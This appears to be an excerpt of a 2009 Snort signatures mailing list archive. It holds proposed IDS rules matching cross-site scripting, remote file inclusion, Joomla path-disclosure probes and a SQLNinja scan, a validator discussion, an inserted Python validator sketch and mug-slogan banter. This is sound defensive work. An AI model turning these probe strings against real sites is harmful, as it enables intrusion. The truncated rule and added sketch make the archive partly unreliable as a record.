url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500304 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (153) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500305 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (153) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500306 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (154) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500307 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (154) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500308 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (155) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500309 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (155) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500310 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (156) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500311 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (156) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500312 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (157) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500313 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (157) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500314 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (158) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500315 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (158) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500316 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (159) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500317 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (159) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500318 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (160) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500319 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (160) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500320 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (161) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500321 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (161) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500322 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (162) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500323 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (162) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500324 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (163) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500325 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (163) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500326 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (164) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500327 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (164) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500328 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (165) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500329 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (165) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500330 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (166) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500331 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (166) || 
     -> Removed from emerging-virus.rules (1):
        #disabling for now. this same payload seems to be used by a number of ping libraries

From frank at knobbe.us Sat Aug 1 19:53:29 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Sat, 1 Aug 2009 18:53:29 -0500
Subject: [Emerging-Sigs] XOOPS viewpmsg.php and user.php XSS Sigs
In-Reply-To:
References:
Message-ID: <20090801235329.GA58782@knobbe.us>

On Sat, Aug 01, 2009 at 01:27:33AM +0100, Kevin Ross wrote:
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Possible
> XOOPS Viewpmesg.php Cross Site Scripting Attack";
> flow:to_server,established; uricontent:"/htdocs/modules/pm/viewpmsg.php";
> nocase; uricontent:" in URI, Possible Cross Site Scripting Attempt"; flow:to_server,established; uricontent:""; nocase; classtype:web-application-attack; reference:url,ha.ckers.org/xss.html; sid:16000001; rev:1;)

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB SRC= in URI, Possible Cross Site Scripting Attempt"; flow:to_server,established; uricontent:"SRC="; nocase; classtype:web-application-attack; reference:url, ha.ckers.org/xss.html; sid:16000002; rev:1;)

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB Onmouseover= in URI - Likely Cross Site Scripting Attempt"; flow:to_server,established; uricontent:"onmouseover="; nocase; classtype:web-application-attack; reference:url, www.w3schools.com/jsref/jsref_onmouseover.asp; sid:16000003; rev:1;)

#alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB Possible Remote File Inclusion Attempt Using path_escape"; flow:to_server,established; uricontent:".php?path_escape=http"; nocase; classtype:web-application-attack; sid:16000004; rev:1;)

#alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB Two .php Extensions Together in URI, Possible Remote File Inclusion Attempt"; flow:to_server,established; uricontent:".php.php"; nocase; classtype:web-application-attack; reference:url, en.wikipedia.org/wiki/Remote_File_Inclusion; sid:16000005; rev:1;)

#alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB Possible Remote File Inclusion Attempt Using php?page="; flow:to_server,established; uricontent:".php?page=http"; nocase; classtype:web-application-attack; reference:url,en.wikipedia.org/wiki/Remote_File_Inclusion; reference:url, projects.webappsec.org/Remote-File-Inclusion; sid:16000006; rev:1;)

#alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB Possible Remote File Inclusion Attempt Using php?file="; flow:to_server,established; uricontent:".php?file=http"; nocase; classtype:web-application-attack; reference:url,en.wikipedia.org/wiki/Remote_File_Inclusion; reference:url, projects.webappsec.org/Remote-File-Inclusion; sid:16000007; rev:1;)

Kevin

From decoder at own-hero.net Wed Aug 5 04:44:27 2009
From: decoder at own-hero.net (decoder)
Date: Wed, 05 Aug 2009 10:44:27 +0200
Subject: [Emerging-Sigs] Snortvalidator Update
Message-ID: <4A79466B.50600@own-hero.net>

Hi Matt :)

after talking to rotorhead yesterday, I extended the snortvalidator
script slightly. First of all, it warns when the flow keyword is used
with different protocols than TCP because to my knowledge, at least
older snorts do not support flow with for example UDP.
Secondly, it validates all PCRE expressions by eval()ing the regex in
perl and checking if perl throws an error. If this is the case, the
script outputs perl's error message, which might be more informative
than snort's messages.

One important thing: In the older version, the flow keyword checker was
not enabled at all, and I enabled it now. It found several SIDs where
flow keywords are specified more than once, and treats them as
_errors_. One example is here:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET SCAN SQLNinja MSSQL Database User Rights Scan"; flow:to_server,established,established; content:"?param=a"; content:"if%20is%5Fsrvrolemember%28%27sysadmin"; distance:2; classtype:attempted-recon; reference:url,sqlninja.sourceforge.net/index.html; reference:url,doc.emergingthreats.net/2009041; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_SQLNinja; sid:2009041; rev:2;)

As you can see there, flow says ":to_server,established,established". If
you update the script, these rules will pop up as errors and they need
to be fixed :)

You can get the new version from the SVN.

Cheers,

Chris
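
[Added example, not part of the original post and not the snortvalidator script itself:] A minimal Python sketch of the three checks described in the message above: flow used with a non-TCP protocol (warning), repeated flow keywords or options (error), and PCRE bodies that do not compile (error). Python's re module stands in for the Perl eval() the post describes, so regex dialect differences are an assumption; the first sample rule is the one quoted in the post, the other two (sids 9000002 and 9000003) are constructed.

```python
import re

# action proto src sport direction dst dport (options)
RULE_RE = re.compile(
    r'^\s*(\w+)\s+(\w+)\s+(\S+)\s+(\S+)\s+(->|<>)\s+(\S+)\s+(\S+)\s*\((.*)\)\s*$',
    re.S)

SAMPLE_RULES = [
    # Rule quoted in the post (duplicate "established" in flow).
    'alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET SCAN '
    'SQLNinja MSSQL Database User Rights Scan"; '
    'flow:to_server,established,established; content:"?param=a"; '
    'content:"if%20is%5Fsrvrolemember%28%27sysadmin"; distance:2; '
    'classtype:attempted-recon; '
    'reference:url,sqlninja.sourceforge.net/index.html; '
    'reference:url,doc.emergingthreats.net/2009041; '
    'reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_SQLNinja; '
    'sid:2009041; rev:2;)',
    # Constructed: flow on a UDP rule.
    'alert udp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"constructed flow on udp"; '
    'flow:to_server; content:"|01 00|"; sid:9000002; rev:1;)',
    # Constructed: unbalanced parenthesis in the pcre body, ';' inside msg.
    r'alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"bad pcre; in msg"; '
    r'flow:established; pcre:"/id=(\d+/i"; sid:9000003; rev:1;)',
]


def split_options(body):
    """Split 'key:value; key; ...' on ';' outside quotes, honouring backslash escapes."""
    opts, buf, in_quote, escaped = [], [], False, False
    for ch in body:
        if escaped:
            buf.append(ch)
            escaped = False
        elif ch == '\\':
            buf.append(ch)
            escaped = True
        elif ch == ';' and not in_quote:
            opt = ''.join(buf).strip()
            if opt:
                key, _, val = opt.partition(':')
                opts.append((key.strip(), val.strip()))
            buf = []
        else:
            if ch == '"':
                in_quote = not in_quote
            buf.append(ch)
    return opts


def check_pcre(value):
    """Return an error string if the pcre option does not compile, else None."""
    expr = value.strip().lstrip('!').strip().strip('"')
    end = expr.rfind('/')
    if not expr.startswith('/') or end == 0:
        return 'pcre is not of the form /regex/flags'
    flags = 0
    for ch in expr[end + 1:]:
        # Snort-specific modifiers (U, R, B, ...) do not affect compilation.
        flags |= {'i': re.I, 's': re.S, 'm': re.M, 'x': re.X}.get(ch, 0)
    try:
        re.compile(expr[1:end], flags)
    except re.error as exc:
        return 'pcre does not compile: %s' % exc
    return None


def check_rule(rule):
    """Return a list of (level, message) findings for one rule line."""
    m = RULE_RE.match(rule)
    if not m:
        return [('error', 'unparseable rule')]
    proto, opts, findings = m.group(2).lower(), split_options(m.group(8)), []
    flows = [val for key, val in opts if key == 'flow']
    if len(flows) > 1:
        findings.append(('error', 'flow keyword used %d times' % len(flows)))
    for val in flows:
        if proto != 'tcp':
            findings.append(('warning', 'flow used with protocol %s' % proto))
        seen = set()
        for item in (part.strip() for part in val.split(',')):
            if item in seen:
                findings.append(('error', 'flow option "%s" repeated' % item))
            seen.add(item)
    for key, val in opts:
        if key == 'pcre':
            err = check_pcre(val)
            if err:
                findings.append(('error', err))
    return findings


if __name__ == '__main__':
    for rule in SAMPLE_RULES:
        sid = dict(split_options(RULE_RE.match(rule).group(8))).get('sid')
        for level, message in check_rule(rule):
            print('sid %s: %s: %s' % (sid, level, message))
```
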

From mail at mare-system.de Wed Aug 5 09:31:49 2009
From: mail at mare-system.de (mareadmin)
Date: Wed, 05 Aug 2009 15:31:49 +0200
Subject: [Emerging-Sigs] some Joomal Path Disclosure vulnerabilities
Message-ID: <4A7989C5.8080106@mare-system.de>

joomla-Full Path Disclosure vulnerabilities

some quite cheap ones

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB Joomla Full Path Disclosure -> php5x.php"; flow:to_server,established; uricontent:"/libraries/joomla/utilities/compat/php50x.php"; offset:0; nocase; reference:bugtraq,35780; reference:url,www.securityfocus.com/archive/1/505231; sid:1122334400; classtype:attempted-recon; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB Joomla Full Path Disclosure -> ldap.php"; flow:to_server,established; uricontent:"/libraries/joomla/client/ldap.php"; offset:0; nocase; reference:bugtraq,35780; reference:url,www.securityfocus.com/archive/1/505231; sid:1122334401; classtype:attempted-recon; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB Joomla Full Path Disclosure -> content.php"; flow:to_server,established; uricontent:"/libraries/joomla/html/html/content.php"; offset:0; nocase; reference:bugtraq,35780; reference:url,www.securityfocus.com/archive/1/505231; sid:1122334402; classtype:attempted-recon; rev:1;)

--
mex
MARE System Kiel .:. http://www.mare-system.de

From jonkman at jonkmans.com Wed Aug 5 09:36:09 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Wed, 05 Aug 2009 09:36:09 -0400
Subject: [Emerging-Sigs] Snortvalidator Update
In-Reply-To: <4A79466B.50600@own-hero.net>
References: <4A79466B.50600@own-hero.net>
Message-ID: <4A798AC9.2010203@jonkmans.com>

Spectacular! Thanks decoder.
I'll get this added to the commit process asap and fix the errors it finds. Matt decoder wrote: > Hi Matt :) > > > after talking to rotorhead yesterday, I extended the snortvalidator > script slightly. First of all, it warns when the flow keyword is used > with different protocols than TCP because to my knowledge, at least > older snorts do not support flow with for example UDP. Secondly, it > validates all PCRE expressions by eval()ing the regex in perl and > checking if perl throws an error. If this is the case, the script > outputs perl's error message, which might be more informative than > snort's messages. > > > One important thing: In the older version, the flow keyword checker was > not enabled at all, and I enabled it now. It found several SIDs where > flow keywords are specified more than once, and threats them as > _errors_. One example is here: > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET SCAN > SQLNinja MSSQL Database User Rights Scan"; > flow:to_server,established,established; content:"?param=a"; > content:"if%20is%5Fsrvrolemember%28%27sysadmin"; distance:2; > classtype:attempted-recon; > reference:url,sqlninja.sourceforge.net/index.html; > reference:url,doc.emergingthreats.net/2009041; > reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_SQLNinja; > sid:2009041; rev:2;) > > > As you can see there, flow says ":to_server,established,established". If > you update the script, these rules will pop up as errors and they need > to be fixed :) > > > You can get the new version from the SVN. 
> > > Cheers, > > > Chris > > > ------------------------------------------------------------------------ > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jonkman at jonkmans.com Wed Aug 5 09:41:24 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Wed, 05 Aug 2009 09:41:24 -0400 Subject: [Emerging-Sigs] Emerging-sigs Digest, Vol 21, Issue 7 In-Reply-To: <1249462887.5841.14.camel@work> References: <1249462887.5841.14.camel@work> Message-ID: <4A798C04.5060000@jonkmans.com> Very funny, but we have a limit of maybe 5-10 words on a coffee mug unfortunately. Otherwise we'd have to have a magnifying glass to read it. :) We could commit this to the ruleset though and leave it disabled. See who notices... Matt Kayvan Javid wrote: > On Tue, 2009-08-04 at 12:00 -0400, > emerging-sigs-request at emergingthreats.net wrote: >> So lets make it a contest, the person that comes up with the best saying >> to put under the logo on the coffee mugs wins their choice of tshirt and >> the first coffee mug off the presses. Please send your ideas in to the >> list. It needs to be short enough to fit on a mug, but funny or profound >> in some way. 
:) >> Thanks >> Matt > > Nice contest, my first bash: > > alert me $INTERNAL_NET any -> 127.0.0.1 $MOUTH_PORTS (msg:"Mmmm > Coffee!"; flow:to_stomach,established; pcre:"(coffee|tea)"; > classtype:thirst-attack;reference:url,http://www.emergingthreats.net/index.php/support-et-and-buy-et-schwag.html; sid:l33t; rev:1;) > -- -------------------------------------------- Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jonkman at jonkmans.com Wed Aug 5 09:53:15 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Wed, 05 Aug 2009 09:53:15 -0400 Subject: [Emerging-Sigs] Snortvalidator Update In-Reply-To: <4A79466B.50600@own-hero.net> References: <4A79466B.50600@own-hero.net> Message-ID: <4A798ECB.4000603@jonkmans.com> Have it integrated and it found two pcre's that were invalid that snort has been nice enough not to mention for the last 6 months they've stood... Thanks decoder, this really helps. Both pcre's are repaired and committed correctly now. Matt decoder wrote: > Hi Matt :) > > > after talking to rotorhead yesterday, I extended the snortvalidator > script slightly. First of all, it warns when the flow keyword is used > with different protocols than TCP because to my knowledge, at least > older snorts do not support flow with for example UDP. Secondly, it > validates all PCRE expressions by eval()ing the regex in perl and > checking if perl throws an error. If this is the case, the script > outputs perl's error message, which might be more informative than > snort's messages. > > > One important thing: In the older version, the flow keyword checker was > not enabled at all, and I enabled it now. It found several SIDs where > flow keywords are specified more than once, and threats them as > _errors_. 
One example is here: > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET SCAN > SQLNinja MSSQL Database User Rights Scan"; > flow:to_server,established,established; content:"?param=a"; > content:"if%20is%5Fsrvrolemember%28%27sysadmin"; distance:2; > classtype:attempted-recon; > reference:url,sqlninja.sourceforge.net/index.html; > reference:url,doc.emergingthreats.net/2009041; > reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_SQLNinja; > sid:2009041; rev:2;) > > > As you can see there, flow says ":to_server,established,established". If > you update the script, these rules will pop up as errors and they need > to be fixed :) > > > You can get the new version from the SVN. > > > Cheers, > > > Chris > > > ------------------------------------------------------------------------ > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From kayvan.javid at smoothwall.net Wed Aug 5 10:48:01 2009 From: kayvan.javid at smoothwall.net (Kayvan Javid) Date: Wed, 05 Aug 2009 15:48:01 +0100 Subject: [Emerging-Sigs] coffee slogan contest In-Reply-To: References: Message-ID: <1249483681.5841.28.camel@work> Bash #2: high load causes packet loss... take a break have a coffee or: while you enjoy the contents.... [ INSERT ET LOGO HERE ] let us deal with your network security or: your network is in good hands or: you drink coffee [ INSERT ET LOGO HERE ] we drink packets or: coffee tastes better when you know [ INSERT ET LOGO HERE ] is looking after your network or: you take a break... 
[INSERT ET LOGO HERE] we're on duty Hehe, think thats enough for now :) From jonkman at jonkmans.com Wed Aug 5 11:54:25 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Wed, 05 Aug 2009 11:54:25 -0400 Subject: [Emerging-Sigs] More Tshirts, and a Coffee Mug Contest In-Reply-To: <87BE69C18762B94EA631E9EF489CCB1F056B05@EVSMTC03.ad.office.aol.com> References: <4A78548C.9070208@jonkmans.com> <4A78B552.7050203@gmail.com> <87BE69C18762B94EA631E9EF489CCB1F056B05@EVSMTC03.ad.office.aol.com> Message-ID: <4A79AB31.5000009@jonkmans.com> This is definitely a leader in my mind as well. Short and sweet. Easy to print. Keep the ideas coming! Matt Salusky, William wrote: > Methinks Bobb has a winner there. Though probably just fine for snort > geeks if it were refined to simply read as: > > content: "|C0 FF EE|"; > > And the obligatory ET logo of course. ;) > > > W > > >> -----Original Message----- >> From: emerging-sigs-bounces at emergingthreats.net >> [mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of harley >> Sent: Tuesday, August 04, 2009 6:25 PM >> To: Matt Jonkman Emerging Threats Signatures >> Subject: Re: [Emerging-Sigs] More Tshirts, and a Coffee Mug Contest >> >> Maybe for the coffee mug: >> alert ip any any -> $HOME_NET $MOUTH (content: "|C0 FF EE|";) >> >> >> >> >> Matt Jonkman wrote: >>> The first run of tshirts was a huge success, we sold every >> single one >>> and had orders backed up. Thanks everyone for both supporting the >>> project and being willing to be a human billboard to spread >> the word! >>> A second printing run of shirts just arrived. We have the >> usual black >>> and blue, by popular demand we now have white as well, and >> some larger >>> sizes as requested. They all look great, so please take a >> moment and >>> order one. What we make on these is going straight into new >> hardware >>> for the sandnet to allow us to process more samples and >> write more signatures! 
>>> We're also going to get coffee mugs and water bottles >> printed up, but >>> I'd like to see what everyone thinks for a saying on those. >> I'd rather >>> not just reproduce the tshirt saying on a mug, so I'd like to hear >>> what everyone thinks for these. >>> >>> So lets make it a contest, the person that comes up with the best >>> saying to put under the logo on the coffee mugs wins their >> choice of >>> tshirt and the first coffee mug off the presses. Please send your >>> ideas in to the list. It needs to be short enough to fit on >> a mug, but >>> funny or profound in some way. :) >>> >>> Get your tshirts here: >>> >> http://www.emergingthreats.net/index.php/support-et-and-buy-et-schwag. >>> html >>> >>> I'm looking forward to the ideas for the saying on the mugs. We may >>> even do a run of shirts with it if they keep selling! >>> >>> Thanks >>> >>> Matt >>> >>> >> _______________________________________________ >> Emerging-sigs mailing list >> Emerging-sigs at emergingthreats.net >> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs >> > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From guise.mcallaster at gmail.com Wed Aug 5 12:01:21 2009 From: guise.mcallaster at gmail.com (Guise McAllaster) Date: Wed, 5 Aug 2009 16:01:21 +0000 Subject: [Emerging-Sigs] More Tshirts, and a Coffee Mug Contest In-Reply-To: <4A78548C.9070208@jonkmans.com> References: <4A78548C.9070208@jonkmans.com> Message-ID: Hi, Here are somes of my idea: ET: Our rule sets are not > 80 MB ET: Not only are we 
current, we aren't pre-compiled ET: Open source, not pre-compiled ET: Proud to have my sigs included in VRT ET: Sourcefire standing on my shoulders ET: We're not sellouts ET: All the rules fit to print If I win, please send my mug to Marty Roesch. Thanks. -Guise On Tue, Aug 4, 2009 at 3:32 PM, Matt Jonkman wrote: > The first run of tshirts was a huge success, we sold every single one > and had orders backed up. Thanks everyone for both supporting the > project and being willing to be a human billboard to spread the word! > > A second printing run of shirts just arrived. We have the usual black > and blue, by popular demand we now have white as well, and some larger > sizes as requested. They all look great, so please take a moment and > order one. What we make on these is going straight into new hardware for > the sandnet to allow us to process more samples and write more signatures! > > We're also going to get coffee mugs and water bottles printed up, but > I'd like to see what everyone thinks for a saying on those. I'd rather > not just reproduce the tshirt saying on a mug, so I'd like to hear what > everyone thinks for these. > > So lets make it a contest, the person that comes up with the best saying > to put under the logo on the coffee mugs wins their choice of tshirt and > the first coffee mug off the presses. Please send your ideas in to the > list. It needs to be short enough to fit on a mug, but funny or profound > in some way. :) > > Get your tshirts here: > http://www.emergingthreats.net/index.php/support-et-and-buy-et-schwag.html > > I'm looking forward to the ideas for the saying on the mugs. We may even > do a run of shirts with it if they keep selling! 
> > Thanks > > Matt > > -- > -------------------------------------------- > Matthew Jonkman > Emerging Threats > Phone 765-429-0398 > Fax 312-264-0205 > http://www.emergingthreats.net > -------------------------------------------- > > PGP: http://www.jonkmans.com/mattjonkman.asc > > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090805/f0122134/attachment.html From phatbuckett at gmail.com Wed Aug 5 12:11:34 2009 From: phatbuckett at gmail.com (Darren Spruell) Date: Wed, 5 Aug 2009 09:11:34 -0700 Subject: [Emerging-Sigs] various sigs In-Reply-To: References: Message-ID: <839aec700908050911p51d7134ex39d2fc0ca0a690f2@mail.gmail.com> On Wed, Aug 5, 2009 at 5:29 AM, Kevin Ross wrote: > Thoughts? I have disabled the ones which in some enviroments may cause high > load/false positives but they work. > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB SRC= in > URI, Possible Cross Site Scripting Attempt"; flow:to_server,established; > uricontent:"SRC="; nocase; classtype:web-application-attack; > reference:url,ha.ckers.org/xss.html; sid:16000002; rev:1;) src= as a URI parameter I would expect to be extremely common. -- Darren Spruell phatbuckett at gmail.com From jamie.riden at gmail.com Wed Aug 5 13:25:12 2009 From: jamie.riden at gmail.com (Jamie Riden) Date: Wed, 5 Aug 2009 18:25:12 +0100 Subject: [Emerging-Sigs] More Tshirts, and a Coffee Mug Contest In-Reply-To: <4A78548C.9070208@jonkmans.com> References: <4A78548C.9070208@jonkmans.com> Message-ID: <17b0fcab0908051025m6eda1011hcbb175d6c78a43c@mail.gmail.com> Don't ask me - I'm still waiting for my "snort: pulling people's arses out of the fire since 1999" T-shirt. 
(Strangely, no-one from sourcefire has taken me up on the suggestion.) cheers, Jamie 2009/8/4 Matt Jonkman : > The first run of tshirts was a huge success, we sold every single one > and had orders backed up. Thanks everyone for both supporting the > project and being willing to be a human billboard to spread the word! > > A second printing run of shirts just arrived. We have the usual black > and blue, by popular demand we now have white as well, and some larger > sizes as requested. They all look great, so please take a moment and > order one. What we make on these is going straight into new hardware for > the sandnet to allow us to process more samples and write more signatures! > > We're also going to get coffee mugs and water bottles printed up, but > I'd like to see what everyone thinks for a saying on those. I'd rather > not just reproduce the tshirt saying on a mug, so I'd like to hear what > everyone thinks for these. > > So lets make it a contest, the person that comes up with the best saying > to put under the logo on the coffee mugs wins their choice of tshirt and > the first coffee mug off the presses. Please send your ideas in to the > list. It needs to be short enough to fit on a mug, but funny or profound > in some way. :) > > Get your tshirts here: > http://www.emergingthreats.net/index.php/support-et-and-buy-et-schwag.html > > I'm looking forward to the ideas for the saying on the mugs. We may even > do a run of shirts with it if they keep selling! > > Thanks > > Matt From jonkman at jonkmans.com Wed Aug 5 13:42:30 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Wed, 05 Aug 2009 13:42:30 -0400 Subject: [Emerging-Sigs] To the Yahoo members we lost... Message-ID: <4A79C486.3010108@jonkmans.com> A reminder, if you know anyone that's using a yahoo email address to subscribe to this list please let them know they're likely no longer subscribed. 
Frequently we mention domain names or words that yahoo has blacklisted, they send a series of non-deliverable notices as it is discussed back to our mailing list manager, and it unsubscribes them. About 350 people were unsubscribed from yahoo addresses last night. Our deepest apologies, but please take it up with yahoo. We've had this issue for years. I recommend going gmail if you're not already there for your anonymous accounts. So please spread the word. I'll try to notify some as well. Matt -- -------------------------------------------- Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From kevross33 at googlemail.com Wed Aug 5 14:07:00 2009 From: kevross33 at googlemail.com (Kevin Ross) Date: Wed, 5 Aug 2009 19:07:00 +0100 Subject: [Emerging-Sigs] various sigs In-Reply-To: <839aec700908050911p51d7134ex39d2fc0ca0a690f2@mail.gmail.com> References: <839aec700908050911p51d7134ex39d2fc0ca0a690f2@mail.gmail.com> Message-ID: Ok. I don't think I have seen it often but if so then it can be dropped as i won't be of any use. 2009/8/5 Darren Spruell > On Wed, Aug 5, 2009 at 5:29 AM, Kevin Ross > wrote: > > Thoughts? I have disabled the ones which in some enviroments may cause > high > > load/false positives but they work. > > > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB SRC= > in > > URI, Possible Cross Site Scripting Attempt"; flow:to_server,established; > > uricontent:"SRC="; nocase; classtype:web-application-attack; > > reference:url,ha.ckers.org/xss.html; sid:16000002; rev:1;) > > src= as a URI parameter I would expect to be extremely common. > > -- > Darren Spruell > phatbuckett at gmail.com > -------------- next part -------------- An HTML attachment was scrubbed... 
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090805/27cce701/attachment.html From kevross33 at googlemail.com Wed Aug 5 14:10:09 2009 From: kevross33 at googlemail.com (Kevin Ross) Date: Wed, 5 Aug 2009 19:10:09 +0100 Subject: [Emerging-Sigs] More Tshirts, and a Coffee Mug Contest In-Reply-To: <87BE69C18762B94EA631E9EF489CCB1F056B05@EVSMTC03.ad.office.aol.com> References: <4A78548C.9070208@jonkmans.com> <4A78B552.7050203@gmail.com> <87BE69C18762B94EA631E9EF489CCB1F056B05@EVSMTC03.ad.office.aol.com> Message-ID: as it said my message bounced my suggestions were: 1) an emerging threat to coffee everywhere (a piggy one) 2) An analyst's coffee trough or: 3) content:"lots of"; content:"c|OFFE|e ="; dsize:>39; content:"inch waist"; Kev 2009/8/4 Salusky, William > Methinks Bobb has a winner there. Though probably just fine for snort > geeks if it were refined to simply read as: > > content: "|C0 FF EE|"; > > And the obligatory ET logo of course. ;) > > > W > > > > -----Original Message----- > > From: emerging-sigs-bounces at emergingthreats.net > > [mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of harley > > Sent: Tuesday, August 04, 2009 6:25 PM > > To: Matt Jonkman 